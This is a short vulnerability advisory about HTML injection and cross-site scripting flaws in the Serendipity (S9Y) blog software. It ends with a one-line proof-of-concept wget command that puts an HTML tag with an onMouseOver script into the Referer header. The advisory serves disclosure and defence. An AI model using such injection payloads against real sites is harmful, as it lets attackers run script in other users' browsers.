S9Y Serendipity HTML Injection and Cross-Site Scripting Vulnerabilities

info
discussion
exploit
solution
references

S9Y Serendipity HTML Injection and Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues through a browser. To exploit the cross-site scripting issue, attackers must entice an unsuspecting user to follow a malicious URI.

The following proof of concept is available for the referrer issue:

wget --referer='http://<hr onMouseOver="alert(7)">' http://someblog.com/